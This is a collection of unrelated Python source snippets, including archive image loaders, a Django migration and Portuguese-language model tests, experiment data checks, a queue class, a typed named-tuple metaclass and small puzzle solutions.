loaded_num, error_num = 0, 0
with zipfile.ZipFile(path, 'r') as zf:
for idx, f in enumerate(zf.namelist()):
if float(sys.version[:3]) <= 3.7:
if f[-3:] not in extentions:
label_name = f[f[:-1].rfind("/")+1:-1]
dict[label_name] = np.array([])
print("Start loading. Label name is %s." % label_name)
continue
else:
label_name = f[f.find("/")+1:f.find("/")+2]
if label_name not in dict.keys():
dict[label_name] = np.array([])
print("Start loading. Label name is %s." % label_name)
try:
img = np.array(Image.open(io.BytesIO(zf.read(f))).resize(resize))
dict[label_name] = np.append(dict[label_name], img).reshape(-1, *img.shape)
loaded_num += 1
except:
print("File '%s' was not able to load." % f)
error_num += 1
for key, imgs in dict.items():
print("Label %s's shape is %s" % (key, imgs.shape))
dict[key] = imgs.astype(int)
print("The number of loaded file was %s." % loaded_num)
print("The number of error file was %s." % error_num)
return dict
def load_tar_file(path, resize):
"""
This function can load the compression format, '.tar' and '.tar.gz'.
"""
if type(resize) is not tuple or len(resize) != 2:
print("Parameter 'resize' should be tuple and the length should be two.")
return
dict = {}
loaded_num, error_num = 0, 0
tar = tarfile.open(path, 'r')
for idx, f in enumerate(tar):
if idx==0: # Index 0 is tar file name.
continue
if f.name[-3:] not in extentions:
label_name = f.name[f.name.rfind("/")+1:]
dict[label_name] = np.array([])
print("Start loading. Label name is %s." % label_name)
continue
try:
img = tar.extractfile(f.name)
img = np.array(Image.open(io.BytesIO(img.read())).resize(resize))
dict[label_name] = np.append(dict[label_name], img).reshape(-1, *img.shape)
loaded_num += 1
except:
print("File '%s' was not able to load." % f)
error_num += 1
tar.close()
for key, imgs in dict.items():
print("Label %s's shape is %s" % (key, imgs.shape))
dict[key] = imgs.astype(int)
print("The number of loaded file was %s." % loaded_num)
print("The number of error file was %s." % error_num)
return dict
|
# Generated by Django 2.2.3 on 2019-07-04 10:08
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('skolr', '0003_auto_20190704_0710'),
]
operations = [
migrations.AddField(
model_name='teacher',
name='typ',
field=models.CharField(default=1, max_length=100),
preserve_default=False,
),
]
|
# FUNCTIONS TO CHECK COLLECTED BEHAVIORAL DATA FOR ATTENTION AND MEMORY EXPERIMENT
import os
import pickle
import pandas as pd
from matplotlib import pyplot as plt
# Functions to Aggregate Subject Data and Verify Correct Stimuli were Presented
def sum_pd(subdir):
'''
input: subject directory (string)
output: full experiment info (dataframe)
'''
files = [ x for x in os.listdir(subdir) if 'pres' in x or 'mem' in x ]
df_list = [ pd.read_csv(subdir+'/'+x) for x in files ]
df = pd.concat(df_list, ignore_index=True)
return(df)
def images(df_col):
'''
input: df column
output: list of image names (strings)
'''
return([ x for x in df_col if type(x)==str])
def check_reps(lst):
'''
input: list of imagenames (strings)
output: number of repeats (int)
'''
return(len(lst)-len(set(lst)))
def list_compare(lst1, lst2):
'''
input: two lists
output: number of shared items between lists
'''
return(set(lst1) & set(lst2))
def check_shared(df, col1, col2,x=None):
'''
inputs: dataframe, two column names (strings), run#=None
outputs: lists images shared between the columns, if any exist
'''
if type(x)==int:
mask = df['Run']==x
msg = list_compare(list(images(df.loc[mask,col1])), list(images(df.loc[mask,col2])))
else:
msg = list_compare(list(images(df[col1])), list(images(df[col2])))
if msg != None:
return(msg)
def validity_check(df, params):
'''
inputs: dataframe, parameters
outputs: if there is an error, outputs
message about validity percentage
(list containing string)
'''
msg = []
if len(df.Run.unique())<params['runs']:
msg = ["It looks like there is test data here! (Fewer than expected # of runs). "]
if len(msg)==0:
if df['Cue Validity'].sum()/(float(params['runs']*params['presentations_per_run'])) != .9:
if len(df.Run.unique())==params['runs']:
msg.append('Incorrect number of invalid attention circles. '+str(params['presentations_per_run']*params['runs']*(100-params['invalid_cue_percentage'])/100))
if len(msg)>0:
return(msg)
def stimulus_check(subdir, params):
'''
input: subject directory (string)
output: message indicating if all stimulus proportions are correct (string)
'''
msg = []
select_cols = ['Cued Face', 'Cued Place',
'Uncued Face', 'Uncued Place',
'Memory Image']
df = sum_pd(subdir)
for x in select_cols:
# check internal repetitions
if check_reps(df[x]) > 0:
msg.append('Internal repetition in '+x+'. ')
# check correct proportion in memory runs, by run
for run in range(params['runs']):
if x!='Memory Image':
if len(check_shared(df, x, 'Memory Image', run)) != params['presentations_per_run']*2/params['mem_to_pres']:
msg.append('Wrong number of prev seen images from one or more categories. ')
print(x, check_shared(df, x, 'Memory Image', run))
# check no composites shown attended AND unattended side, total
if len(check_shared(df[df['Trial Type']=='Presentation'],'Cued Composite', 'Uncued Composite'))>0:
msg.append('Overlapping cued and uncued composites. ')
# check no repeats within composite columns (cued, uncued)
if check_reps(df['Cued Composite']) + check_reps(df['Uncued Composite']) > 0:
msg.append('Repeat within cued or uncued composites. ')
msg.append(validity_check(df, params))
if len(msg)==1 and msg[0]==None:
msg.append("All stimulus proportions correct!")
return(msg)
|
# -*- coding: utf-8 -*-
from collections import Counter
class Solution:
def hasGroupsSizeX(self, deck):
counts = Counter(deck).values()
min_count = min(counts)
if min_count == 1:
return False
partition_size = min_count
for count in counts:
remainder = count % min_count
if remainder > 1:
partition_size = min(partition_size, remainder)
return all(count % partition_size == 0 for count in counts)
if __name__ == "__main__":
solution = Solution()
assert solution.hasGroupsSizeX([1, 2, 3, 4, 4, 3, 2, 1])
assert not solution.hasGroupsSizeX([1, 1, 1, 2, 2, 2, 3, 3])
assert not solution.hasGroupsSizeX([1])
assert solution.hasGroupsSizeX([1, 1])
assert solution.hasGroupsSizeX([1, 1, 2, 2, 2, 2])
assert solution.hasGroupsSizeX([1, 1, 1, 1, 2, 2, 2, 2, 2, 2])
|
# Linear Queue
import array
class LinearQueue:
def __init__(self, capacity):
self.capacity = capacity
self.front = 0
self.rear = 0
self.array = array.array('l', [0]*capacity)
def put(self, value):
if self.rear == self.capacity:
return False
self.array[self.rear] = value
self.rear += 1
return True
def get(self):
if self.front == self.rear:
return None
value = self.array[self.front]
self.front += 1
return value
def peek(self):
if self.front == self.rear:
return None
else:
return self.array[self.front]
def print(self):
if self.front == self.rear:
print('empty')
else:
for i in range(self.front, self.rear):
print(self.array[i], end=' ')
print()
linearQueue = LinearQueue(5)
for i in range(8):
linearQueue.put(i + 1)
linearQueue.print()
print(linearQueue.get())
print(linearQueue.get())
linearQueue.print()
print(linearQueue.peek())
|
# -*- coding: utf-8 -*-
"""
Avaliacao.test_models
~~~~~~~~~~~~~~
Testa coisas relacionada ao modelo.
:copyright: (c) 2011 by Felipe Arruda Pontes.
"""
import datetime
from django.test import TestCase
from model_mommy import mommy
from Avaliacao.models import Avaliacao, TemplateAvaliacao
from Materia.Turma.models import Turma
from Avaliacao.Questao.models import TipoQuestao, FiltroQuestao
from Aluno.models import Aluno
class AvaliacaoTest(TestCase):
def setUp(self):
self.avaliacao = mommy.make_one(Avaliacao)
def test_avaliacao_save(self):
" verifica se consegue salvar um avaliacao "
self.avaliacao.save()
self.assertEqual(self.avaliacao.id, 1)
class TemplateAvaliacaoTest(TestCase):
fixtures = ['test_alunos']
def setUp(self):
self.aluno = Aluno.objects.get(pk=1)
self.turma = mommy.make_one(Turma,nome="Teste",sigla="tst")
self.gerar_tipoQuestao()
self.gerar_Questoes()
def gerar_tipoQuestao(self):
"gera tipos de questao que sao denominados tipo1-10"
from Avaliacao.Questao.models import TipoQuestao
for i in xrange(1,11):
tipo = TipoQuestao(tipo="tipo%s"%str(i))
tipo.save()
# print "tipo %s"%str(tipo.id)
def gerar_Questoes(self):
"""gera questões mocked com tipo variando
"""
from Avaliacao.Questao.models import Questao
for i in xrange(1,21):
#:basicamente quando i=1 -> mod = 1; i = 10 -> mod = 10; i = 11 -> mod = 1; i=20 -> mod = 10
mod = i%10 if i != 10 and i != 20 else 10
#:retorna basicamente tipos de questao que tem PK < i(nunca ultrapassando 10)
tipos = TipoQuestao.objects.filter(pk__lte=mod)
questao = mommy.make_one(Questao,tipo=tipos,titulo="questao%s"%str(i))
#forcando verificada, ja que estas questoes sao mocks e nao seriam verificadas automaticamente.
#por que se fossem iriam dar erro no arquivo fonte.
questao.verificada=True
questao.save(verificar=False)
print "q=%s i=%s mod=%s"%(questao.id,i,mod)
# questao.save()
def test_fixtures(self):
"testar as fixtures carregaram corretamente"
self.assertEquals(Aluno.objects.get(pk=1).slug,'123456')
def gerarFiltroQuestao(self,num_tipos,template):
"""gera filtros de questao para um determinado template,
considerando que vai pegar todos os tipos que tem pk <= num_tipos"""
tipos = TipoQuestao.objects.filter(pk__lte=num_tipos)
filtro = mommy.make_one(FiltroQuestao,templateAvaliacao=template,questaoExata=None,tipo=tipos)
return filtro
# for tipo in filtro.tipo.all():
# print "tipo %s"%str(tipo.id)
# print "="
# def test_gerarAvaliacao_templateAvaliacao(self):
# " verifica se consegue gerarAvaliacao por templateAvaliacao "
# self.templateAvaliacao = TemplateAvaliacao(titulo="Avaliacao Teste",turma=self.turma,ativa=True)
# self.templateAvaliacao.data_inicio = datetime.datetime.now()
# self.templateAvaliacao.data_termino = datetime.datetime.now() + datetime.timedelta(hours=2)
# self.templateAvaliacao.save()
# for i in xrange(1,11):
# self.gerarFiltroQuestao(i,self.templateAvaliacao)
# avaliacao = self.templateAvaliacao.gerarAvaliacao(self.aluno)
# self.assertEqual(avaliacao.titulo,self.templateAvaliacao.titulo)
# import pdb; pdb.set_trace()
# for i in xrange(0,10):
# questao = avaliacao.questoes.all()[i]
# self.assertIn(questao.questao.id,[i+1,i+11])
def test_list_templatesAvaliacao_aluno(self):
" verifica se o metodo list_templatesAvaliacao_aluno retorna todos os templates corretamente "
templates_list_espected= []
for turma_num in xrange(1,3):
turma = mommy.make_one(Turma,nome="Teste%s"%str(turma_num),sigla="tst%s"%str(turma_num))
if turma_num == 1:
turma.alunos.add(self.aluno)
for template_num in xrange(1,3):
templateAvaliacao = TemplateAvaliacao(titulo="Avaliacao Teste %s"%str(template_num),turma=turma,ativa=True)
templateAvaliacao.data_inicio = datetime.datetime.now()
templateAvaliacao.data_termino = datetime.datetime.now() + datetime.timedelta(hours=2)
templateAvaliacao.save()
for filtro in xrange(1,11):
self.gerarFiltroQuestao(filtro,templateAvaliacao)
if turma_num == 1 and template_num != 1:
templates_list_espected.append(templateAvaliacao)
if template_num == 1:
templateAvaliacao.gerarAvaliacao(self.aluno)
templates_list = TemplateAvaliacao.objects.list_templatesAvaliacao_aluno(self.aluno)
print "lista"
print templates_list
for template in templates_list:
self.assertIn(template,templates_list_espected)
for template in templates_list_espected:
self.assertIn(template,templates_list)
# def test_gerar_simulado(self):
# " verifica se ao gerar um avaliacão para um aluno ele faz corretamente, como filtros, questoes exatas e etc..."
# from Avaliacao.Questao.models import Questao
# #prepara a avaliacao
# self.templateAvaliacao = TemplateAvaliacao(titulo="Avaliacao Teste Criacao",turma=self.turma,ativa=False)
# self.templateAvaliacao.data_inicio = datetime.datetime.now() + datetime.timedelta(hours=3)
# self.templateAvaliacao.data_termino = datetime.datetime.now() + datetime.timedelta(hours=5)
# self.templateAvaliacao.save()
# #prepara os filtros
# for i in xrange(1,11):
# filtro = self.gerarFiltroQuestao(i,self.templateAvaliacao)
# #se for o 5 filtro prepara para testar o caso da questao exata
# if i == 5:
# #coloca o filtro 5 como sendo a questao de id 4
# filtro.questaoExata = Questao.objects.get(pk=4)
# filtro.save()
# print "filtro %s" %(filtro.questaoExata)
# print ">>gerar simulado"
# #gera a avaliacao pra um aluno(nesse caso um simulado)
# avaliacao = self.templateAvaliacao.gerarAvaliacao(self.aluno,True)
# #verifica se a avaliacao tem o mesmo titulo que o templateAvaliacao
# self.assertEqual(avaliacao.titulo,self.templateAvaliacao.titulo)
# #verifica se as questões foram selecionadas corretamente
# #sendo que se a 4º questao for a questao de id =4, então obrigatoriamente a 5º questão(a que era exata) devera ser "randomizada" como sendo
# #a unica que falta, a questão de id 14, se ela nao for a 4 então deve ser exatamente o oposto, e se nao for isso entao é um erro!
# quarta_questao = avaliacao.questoes.all()[3].questao
# quinta_questao = avaliacao.questoes.all()[4].questao
# msg_erro="a questao exata nao foi gerada corretamente no simulador %d - %d"
# self.assertFalse(quarta_questao.id==quinta_questao.id,"%d -%d"%(quarta_questao.id,quinta_questao.id))
# if quarta_questao.id == 4:
# self.assertEqual(quinta_questao.id,14,msg_erro%(quinta_questao.id,14))
# elif quarta_questao.id == 14:
# self.assertEqual(quinta_questao.id,4,msg_erro%(quinta_questao.id,4))
# else:
# self.fail(u"a quarta questao não foi nem 4 nem 14, e isso ta errado.")
# def test_gerar_avaliacao(self):
# " verifica se ao gerar um simulado para um aluno ele faz corretamente, trocando questoes exatas e etc..."
# from Avaliacao.Questao.models import Questao
# #prepara a avaliacao
# self.templateAvaliacao = TemplateAvaliacao(titulo="Avaliacao Teste simulado",turma=self.turma,ativa=False)
# self.templateAvaliacao.data_inicio = datetime.datetime.now() + datetime.timedelta(hours=3)
# self.templateAvaliacao.data_termino = datetime.datetime.now() + datetime.timedelta(hours=5)
# self.templateAvaliacao.save()
# #prepara os filtros
# for i in xrange(1,11):
# filtro = self.gerarFiltroQuestao(i,self.templateAvaliacao)
# #se for o 5 filtro prepara para testar o caso da questao exata
# if i == 5:
# #coloca o filtro 5 como sendo a questao de id 4
# filtro.questaoExata = Questao.objects.get(pk=4)
# filtro.save()
# print "filtro %s" %(filtro.questaoExata)
# print ">>gerar simulado"
# #gera a avaliacao pra um aluno(nesse caso um simulado)
# avaliacao = self.templateAvaliacao.gerarAvaliacao(self.aluno,True)
# #verifica se a avaliacao tem o mesmo titulo que o templateAvaliacao
# self.assertEqual(avaliacao.titulo,self.templateAvaliacao.titulo)
# #verifica se as questões foram selecionadas corretamente
# #sendo que se a 4º questao for a questao de id =4, então obrigatoriamente a 5º questão(a que era exata) devera ser "randomizada" como sendo
# #a unica que falta, a questão de id 14, se ela nao for a 4 então deve ser exatamente o oposto, e se nao for isso entao é um erro!
# quarta_questao = avaliacao.questoes.all()[3].questao
# quinta_questao = avaliacao.questoes.all()[4].questao
# msg_erro="a questao exata nao foi gerada corretamente no simulador %d - %d"
# self.assertFalse(quarta_questao.id==quinta_questao.id,"%d -%d"%(quarta_questao.id,quinta_questao.id))
# if quarta_questao.id == 4:
# self.assertEqual(quinta_questao.id,14,msg_erro%(quinta_questao.id,14))
# elif quarta_questao.id == 14:
# self.assertEqual(quinta_questao.id,4,msg_erro%(quinta_questao.id,4))
# else:
# self.fail(u"a quarta questao não foi nem 4 nem 14, e isso ta errado.")
class GerarAvaliacaoTest(TestCase):
fixtures = ['test_alunos']
def setUp(self):
self.aluno = Aluno.objects.get(pk=1)
self.turma = mommy.make_one(Turma,nome="Teste",sigla="tst")
self.gerar_tipoQuestao()
self.gerar_Questoes()
self.gerarTemplate()
def gerar_tipoQuestao(self):
"gera tipos de questao que sao denominados tipo1-10, com 3 filhos cada(nomeados tipoX-1-tipoX-3)"
from Avaliacao.Questao.models import TipoQuestao
for i in xrange(1,11):
tipo = TipoQuestao(tipo="tipo%s"%str(i))
tipo.save()
for j in xrange(1,4):
tipo_filho = TipoQuestao(tipo="tipo%s-%s" % (i,j), tipoPai=tipo)
tipo_filho.save()
# print "tipo %s"%str(tipo.id)
def gerar_Questoes(self):
"""gera questoes mocked com tipo variando
"""
import random
from Avaliacao.Questao.models import Questao
for i in xrange(1,31):
#:basicamente quando i=1 -> mod = 1; i = 10 -> mod = 10; i = 11 -> mod = 1; i=20 -> mod = 10
mod = i%10
if mod == 0:
mod = 10
#:retorna basicamente tipos de questao que tem PK < i(nunca ultrapassando 10)
tipos_pai = TipoQuestao.objects.filter( tipo__in = ["tipo%s"%str(j) for j in xrange(1,mod+1)] )
tipos_escolhidos = []
for tipo_pai in tipos_pai:
tipos_filho_e_proprio=tipo_pai.get_descendants(include_self=True)
rand_tipo = random.randint(0, tipos_filho_e_proprio.__len__()-1)
tipos_escolhidos.append( tipos_filho_e_proprio[rand_tipo] )
questao = mommy.make_one(Questao,tipo=tipos_escolhidos,titulo="questao%s"%str(i))
#forcando verificada, ja que estas questoes sao mocks e nao seriam verificadas automaticamente.
#por que se fossem iriam dar erro no arquivo fonte.
questao.verificada=True
questao.save(verificar=False)
print "q=%s i=%s mod=%s"%(questao.id,i,mod)
# questao.save()
def gerarFiltroQuestaoParaTemplate(self,num_tipos,template):
"""gera filtros de questao para um determinado template,
considerando que vai pegar todos os tipos que tem pk <= num_tipos"""
tipos_pai = TipoQuestao.objects.filter( tipo__in = ["tipo%s"%str(j) for j in xrange(1,num_tipos+1)] )
#tipos = TipoQuestao.objects.filter(pk__lte=num_tipos)
filtro = mommy.make_one(FiltroQuestao,templateAvaliacao=template,questaoExata=None,tipo=tipos_pai)
return filtro
def gerarTemplate(self):
"gera um template com filtro coerentes"
from Avaliacao.Questao.models import Questao
#prepara a avaliacao
self.templateAvaliacao = TemplateAvaliacao(titulo="Avaliacao Teste Filtros",turma=self.turma,ativa=True)
self.templateAvaliacao.data_inicio = datetime.datetime.now() - datetime.timedelta(hours=3)
self.templateAvaliacao.data_termino = datetime.datetime.now() + datetime.timedelta(hours=5)
self.templateAvaliacao.save()
#prepara os filtros
#são 10 questões na avaliação
for num_tipos in xrange(1,11):
filtro = self.gerarFiltroQuestaoParaTemplate(num_tipos,self.templateAvaliacao)
#se for o 5 filtro prepara para testar o caso da questao exata
if num_tipos == 5:
#coloca o filtro 5 como sendo a questao de id 4
filtro.questaoExata = Questao.objects.get(pk=1)
filtro.save()
print "filtro %s" %(filtro.questaoExata)
def test_fixtures(self):
"testar as fixtures carregaram corretamente"
self.assertEquals(Aluno.objects.get(pk=1).slug,'123456')
def test_filtrarQuestao(self):
"testar se um filtroQuestao(pk=6) retorna corretamente as questoes possiveis"
for num_id in xrange(1,11):
filtro = FiltroQuestao.objects.get(pk=num_id)
lista_ids_questoes=[]
for i in xrange(num_id,11):
lista_ids_questoes.append(i)
lista_ids_questoes.append(i+10)
lista_ids_questoes.append(i+20)
if num_id == 5:
lista_ids_questoes= [1]
print "lista_ids_questoes>> %s" % str(lista_ids_questoes)
questoes_selecionadas = filtro.filtrarQuestao()
msg_erro="Questao de pk:%s nao esta dentro da lista que questoes possiveis do filtro de pk:%s"
for questao in questoes_selecionadas:
self.assertIn(questao.pk, lista_ids_questoes, msg_erro%(questao.pk,num_id))
def test_gerarAvaliacao(self):
"testa se a avaliacao foi gerada corretamente"
avaliacao = self.templateAvaliacao.gerarAvaliacao(self.aluno)
#verifica se a avaliacao tem o mesmo titulo que o templateAvaliacao
self.assertEqual(avaliacao.titulo,self.templateAvaliacao.titulo)
msg_error="Questao de Avaliacao: %s nao esta presente na lista de questoes possiveis para o filtro:%s"
questoes_selecionadas = []
#verifica se as questões foram selecionadas corretamente
for i in xrange(0,10):
questaoAvaliacao = avaliacao.questoes.all()[i]
filtroCorrespondente = questaoAvaliacao.filtro
print ">>>> I :%d" % i
self.assertNotIn(questaoAvaliacao.questao, questoes_selecionadas)
self.assertIn(questaoAvaliacao.questao,filtroCorrespondente.filtrarQuestao())
questoes_selecionadas.append(questaoAvaliacao.questao)
class GerarAvaliacaoCasoA1Test(TestCase):
"""
fazendo isso basado no caso A1 descrito na documentacao
Basicamente:
q1 -> C, Facil
q2 -> C, Facil
q3 -> C.malloc, Facil
q4 -> C++, Facil
q5 -> C,C++, c.malloc, Facil
Avaliação ->
1 -> q1
2 -> C, Facil
3 -> Facil, C.Malloc
Resultado esperado ->
1 -> q1
2 -> C, Facil (q2, q5)
3 -> Facil, C.Malloc (q3, q5)
Resultado ->
1 -> Facil, C.Malloc
2 -> C, Facil
3 -> q5 ou q1(aleatoriamente)
"""
fixtures = ['test_alunos']
def setUp(self):
self.aluno = Aluno.objects.get(pk=1)
self.turma = mommy.make_one(Turma,nome="Teste",sigla="tst")
self.gerar_tipoQuestao()
self.gerar_Questoes()
self.gerarTemplate()
def gerar_tipoQuestao(self):
"gera tipos de questao que sao denominados tipo1-10, com 3 filhos cada(nomeados tipoX-1-tipoX-3)"
from Avaliacao.Questao.models import TipoQuestao
tipo_C = TipoQuestao(tipo="C")
tipo_C.save()
tipo_C_Malloc = TipoQuestao(tipo="Malloc", tipoPai=tipo_C)
tipo_C_Malloc.save()
tipo_CPP = TipoQuestao(tipo="CPP")
tipo_CPP.save()
tipo_Facil = TipoQuestao(tipo="Facil")
tipo_Facil.save()
def gerar_Questoes(self):
"""gera questoes mocked com tipo variando
"""
import random
from Avaliacao.Questao.models import Questao
tipos=[]
#q1 -> C, Facil
tipos = TipoQuestao.objects.filter(tipo__in = ["C", "Facil"] )
q1 = mommy.make_one(Questao,tipo=tipos,titulo="questao1")
q1.verificada=True
q1.save(verificar=False)
#q2 -> C, Facil
tipos = TipoQuestao.objects.filter(tipo__in = ["C", "Facil"] )
q2 = mommy.make_one(Questao,tipo=tipos,titulo="questao2")
q2.verificada=True
q2.save(verificar=False)
#q3 -> C.malloc, Facil
tipos = TipoQuestao.objects.filter(tipo__in = ["Malloc", "Facil"] )
q3 = mommy.make_one(Questao,tipo=tipos,titulo="questao3")
q3.verificada=True
q3.save(verificar=False)
#q4 -> C++, Facil
tipos = TipoQuestao.objects.filter(tipo__in = ["CPP", "Facil"] )
q4 = mommy.make_one(Questao,tipo=tipos,titulo="questao4")
q4.verificada=True
q4.save(verificar=False)
#q5 -> C,C++, c.malloc, Facil
tipos = TipoQuestao.objects.filter(tipo__in = ["C","Malloc","CPP", "Facil"] )
q5 = mommy.make_one(Questao,tipo=tipos,titulo="questao5")
q5.verificada=True
q5.save(verificar=False)
def gerarTemplate(self):
"gera um template com filtro coerentes"
from Avaliacao.Questao.models import Questao
# Avaliação ->
# 1 -> q1
# 2 -> C, Facil
# 3 -> Facil, C.Malloc
#prepara a avaliacao
self.templateAvaliacao = TemplateAvaliacao(titulo="Avaliacao Teste Filtros",turma=self.turma,ativa=True)
self.templateAvaliacao.data_inicio = datetime.datetime.now() - datetime.timedelta(hours=3)
self.templateAvaliacao.data_termino = datetime.datetime.now() + datetime.timedelta(hours=5)
self.templateAvaliacao.save()
#prepara os filtros
#são 3 questoes na avaliacao
tipos = TipoQuestao.objects.filter(tipo__in = ["C", "Facil"] )
fq1 = mommy.make_one(FiltroQuestao,templateAvaliacao=self.templateAvaliacao,questaoExata=Questao.objects.get(pk=1),tipo=tipos)
fq1.save()
tipos = TipoQuestao.objects.filter(tipo__in = ["C", "Facil"] )
fq2 = mommy.make_one(FiltroQuestao,templateAvaliacao=self.templateAvaliacao,questaoExata=None,tipo=tipos)
fq2.save()
tipos = TipoQuestao.objects.filter(tipo__in = ["Facil","Malloc"] )
fq3 = mommy.make_one(FiltroQuestao,templateAvaliacao=self.templateAvaliacao,questaoExata=None,tipo=tipos)
fq3.save()
def test_fixtures(self):
"testar as fixtures carregaram corretamente"
self.assertEquals(Aluno.objects.get(pk=1).slug,'123456')
def test_filtrarQuestao(self):
"testar se um filtroQuestao(pk=6) retorna corretamente as questoes possiveis"
msg_erro="Questao de pk:%s nao esta dentro da lista que questoes possiveis do filtro de pk:%s"
fq1 = FiltroQuestao.objects.get(pk=1)
questoes_selecionadas1 = fq1.filtrarQuestao()
for questao in questoes_selecionadas1:
self.assertEquals([questao.pk,], [1,], msg_erro%(questao.pk,fq1.pk))
fq2 = FiltroQuestao.objects.get(pk=2)
questoes_selecionadas2 = fq2.filtrarQuestao()
num_questoes = questoes_selecionadas2.__len__()
self.assertEquals(num_questoes , 4, "filtro 2 nao teve numero correto de questoes. Esperava: %s mas veio %s" % (4, num_questoes))
for questao in questoes_selecionadas2:
questoes_ids = [1,2,3,5]
self.assertIn(questao.pk, questoes_ids , msg_erro%(questao.pk,fq2.pk))
fq3 = FiltroQuestao.objects.get(pk=3)
questoes_selecionadas3 = fq3.filtrarQuestao()
num_questoes = questoes_selecionadas3.__len__()
self.assertEquals(num_questoes , 2, "filtro 3 nao teve numero correto de questoes. Esperava: %s mas veio %s" % (2, num_questoes))
for questao in questoes_selecionadas3:
questoes_ids = [3,5]
self.assertIn(questao.pk, questoes_ids , msg_erro%(questao.pk,fq3.pk))
def test_gerarAvaliacao(self):
"testa se a avaliacao foi gerada corretamente"
# Resultado esperado ->
# 1 -> q1
# 2 -> C, Facil (q2, q5)
# 3 -> Facil, C.Malloc (q3, q5)
#
avaliacao = self.templateAvaliacao.gerarAvaliacao(self.aluno)
#verifica se a avaliacao tem o mesmo titulo que o templateAvaliacao
self.assertEqual(avaliacao.titulo,self.templateAvaliacao.titulo)
msg_error="Questao de Avaliacao: %s nao esta presente na lista de questoes possiveis para o filtro:%s"
possiveis_q1 = [1,]
possiveis_q2 = [2,3,5]
possiveis_q3 = [3,5]
q1 = avaliacao.questoes.all()[0]
self.assertIn(q1.questao.pk, possiveis_q1, msg_error % (q1, 1 ))
q2 = avaliacao.questoes.all()[1]
self.assertIn(q2.questao.pk, possiveis_q2, msg_error % (q2, 2 ))
q3 = avaliacao.questoes.all()[2]
self.assertIn(q3.questao.pk, possiveis_q3, msg_error % (q3, 3 ))
self.assertFalse(q1.questao.pk == q2.questao.pk)
self.assertFalse(q2.questao.pk == q3.questao.pk)
self.assertFalse(q1.questao.pk == q3.questao.pk)
print "q1: %s" % (q1,)
print "q2: %s" % (q2,)
print "q3: %s" % (q3,)
|
from __future__ import print_function
import copy
from collections import OrderedDict
from functools import partial
from operator import itemgetter as _itemgetter
import six
# TypedNamedTuple is largely structured the way the code generated by
# NamedTuple is structured. However, by itself it is empty. When a
# child class is created, the metaclass on TypedNamedTuple
# (TypedNamedTupleMeta) iterates over the new class looking for TProp
# class properties, which it will then use to build the field list,
# actual tuple, and the properties indexed into the tuple, just like
# on a named tuple.
# TypedNamedTupleMeta also saves the type information into a new field
# on the resulting class (_types). TypedNamedTuple's __new__ method
# will use that type information for all incoming parameters for the
# new instance, and raise a TypeError (or whatever the type itself
# raises on an incompatible input.
class TypedNamedTupleMeta(type):
def __new__(mcl, name, parents, dct):
if name == "TypedNamedTuple":
return super(TypedNamedTupleMeta,
mcl).__new__(mcl, name, parents, dct)
fields = []
for k, v in dct.items():
if k.startswith("_"):
continue
if isinstance(v, TProp):
fields.append((k,) + v)
if fields:
fields = sorted(fields, key=lambda f: f[1])
field_names = tuple(f[0] for f in fields)
new_dct = {k: v for k, v in dct.items() if k not in field_names}
if fields:
new_dct["_fields"] = field_names
types = {}
for field_name, idx in zip(field_names, range(len(field_names))):
new_dct[field_name] = property(_itemgetter(idx),
doc='Alias for field number %d' % idx)
types[field_name] = fields[idx][2]
new_dct["_types"] = types
# Make vars() work on result
new_dct["__dict__"] = property(parents[0]._asdict)
ret = super(TypedNamedTupleMeta,
mcl).__new__(mcl, name, parents, new_dct)
return ret
class TProp(tuple):
cnt = 0
def __new__(_cls, typ):
if type(typ) is not type:
raise TypeError('typ argument must be a type.')
cnt = _cls.cnt
_cls.cnt += 1
return tuple.__new__(_cls, (cnt, typ))
@classmethod
def _reset(_cls):
_cls.cnt = 0
IntProp = partial(TProp, int)
FloatProp = partial(TProp, float)
StrProp = partial(TProp, str)
@six.add_metaclass(TypedNamedTupleMeta)
class TypedNamedTuple(tuple):
__slots__ = ()
_fields = ()
_types = {}
def __new__(_cls, *args, **kw):
"""Create new instance of namedtype tuple."""
typed_args = _cls._type_check(*args, **kw)
return super(TypedNamedTuple, _cls).__new__(_cls, typed_args)
@classmethod
def _make(cls, iterable, new=tuple.__new__, len=len):
'Make a new NT object from a sequence or iterable'
result = new(cls, iterable)
if len(result) != len(cls._fields):
raise TypeError('Expected %d arguments, got %d' % (
len(cls._fields), len(result)))
return result
def __repr__(self):
'Return a nicely formatted representation string'
args = zip(self._fields, self)
arg_strs = ["%s=%r" % pair for pair in args]
return '%s(%s)' % (self.__class__.__name__,
", ".join(arg_strs))
def _asdict(self):
'Return a new OrderedDict which maps field names to their values'
return OrderedDict(zip(self._fields, self))
def _replace(_self, **kwds):
'Return a new object replacing specified fields with new values'
result = _self._make(map(kwds.pop, _self._fields, _self))
if kwds:
raise ValueError('Got unexpected field names: %r' % kwds.keys())
return result
def __getnewargs__(self):
'Return self as a plain tuple. Used by copy and pickle.'
return tuple(self)
def __getstate__(self):
'Exclude the OrderedDict from pickling'
pass
@classmethod
def _type_check(cls, *args, **kw):
"""Check types of args against cls expected types.
If the type is the expected type, pass though.
If the type isn't then pass the argument through the type as callable
to see if coercion is possible.
"""
ret = []
if len(args) > len(cls._fields):
msg = ("__new__() takes %d positional arguments but %d were given"
% (len(cls._fields), len(args)))
raise TypeError(msg)
faz = zip(cls._fields, args)
for field, arg in faz:
typ = cls._types[field]
if isinstance(arg, typ):
ret.append(arg)
else:
ret.append(typ(arg))
missing = []
# Only look for fields not in arg list.
for field in cls._fields[len(ret):]:
if field in kw:
typ = cls._types[field]
arg = kw[field]
if isinstance(arg, typ):
ret.append(arg)
else:
ret.append(typ(arg))
else:
missing.append(field)
if missing:
raise TypeError("%s missing %d required positional argument%s: %s"
% (cls.__name__, len(missing),
"s" if len(missing)>1 else "",
", ".join([repr(m) for m in missing])))
return ret
def to_dict(self):
return dict(zip(self._fields, tuple(self)))
|
f = open("edinput.txt")
lines = f.readlines()
def update_position(min_v, max_v):
return min_v + (max_v - min_v) // 2
higher = -1
ids = []
for line in lines:
min_row = 0
max_row = 127
min_col = 0
max_col = 7
for c in line:
if c == 'F':
max_row = update_position(min_row, max_row)
elif c == 'B':
min_row = update_position(min_row, max_row) + 1
elif c == 'L':
max_col = update_position(min_col, max_col)
elif c == 'R':
min_col = update_position(min_col, max_col) + 1
seat_id = min_row * 8 + min_col
ids.append(seat_id)
higher = max([seat_id, higher])
print(higher)
ids = sorted(ids)
for i in range(0, len(ids)-1):
if ids[i+1] - ids[i] > 1:
print(ids[i] + 1)
break
f.close()
|
from dependency_injector import containers, providers
from core.env import Environment
from core.event_hub import EventHub
